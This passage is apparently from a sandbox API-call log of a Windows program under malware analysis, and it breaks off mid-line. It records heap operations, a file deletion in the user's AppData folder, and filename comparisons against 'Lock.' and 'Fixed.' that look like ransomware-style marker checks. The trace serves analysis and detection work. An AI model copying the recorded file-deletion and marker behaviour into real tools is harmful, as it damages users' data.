returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0199.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0199.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.104] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0199.105] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.105] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8a) returned 0x2420898 [0199.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/GHNzGfsXtZO 6LRI5J.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GHNzGfsXtZO 6LRI5J.png", lpFilePart=0x8bedfc*="GHNzGfsXtZO 6LRI5J.png") returned 0x44 [0199.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0199.107] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GHNzGfsXtZO 6LRI5J.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ghnzgfsxtzo 6lri5j.png")) returned 0x2020 [0199.107] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GHNzGfsXtZO 6LRI5J.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4819ce50, ftCreationTime.dwHighDateTime=0x1d4c732, ftLastAccessTime.dwLowDateTime=0x81e40e10, ftLastAccessTime.dwHighDateTime=0x1d4cf35, ftLastWriteTime.dwLowDateTime=0x81e40e10, ftLastWriteTime.dwHighDateTime=0x1d4cf35, nFileSizeHigh=0x0, nFileSizeLow=0xc2ab, dwReserved0=0xb01, dwReserved1=0x4, cFileName="GHNzGfsXtZO 6LRI5J.png", cAlternateFileName="GHNZGF~1.PNG")) returned 0xaa5660 [0199.107] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GHNzGfsXtZO 6LRI5J.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ghnzgfsxtzo 6lri5j.png")) returned 1 [0199.109] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4819ce50, ftCreationTime.dwHighDateTime=0x1d4c732, ftLastAccessTime.dwLowDateTime=0x81e40e10, ftLastAccessTime.dwHighDateTime=0x1d4cf35, ftLastWriteTime.dwLowDateTime=0x81e40e10, ftLastWriteTime.dwHighDateTime=0x1d4cf35, nFileSizeHigh=0x0, nFileSizeLow=0xc2ab, dwReserved0=0xb01, dwReserved1=0x4, cFileName="GHNzGfsXtZO 6LRI5J.png", cAlternateFileName="GHNZGF~1.PNG")) returned 0 [0199.109] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0199.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.110] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0199.110] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0199.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.111] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8a) returned 0x2420898 [0199.113] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/GHNzGfsXtZO 6LRI5J.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GHNzGfsXtZO 6LRI5J.png", lpFilePart=0x8bf658*="GHNzGfsXtZO 6LRI5J.png") returned 0x44 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0199.113] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GHNzGfsXtZO 6LRI5J.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ghnzgfsxtzo 6lri5j.png")) returned 0xffffffff [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.113] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0199.113] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.113] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Go gw9icCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o gw9icCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" gw9icCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gw9icCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w9icCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9icCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cCK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CK1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.115] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Go gw9icCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o gw9icCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" gw9icCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gw9icCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w9icCK1.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0199.115] CompareStringW 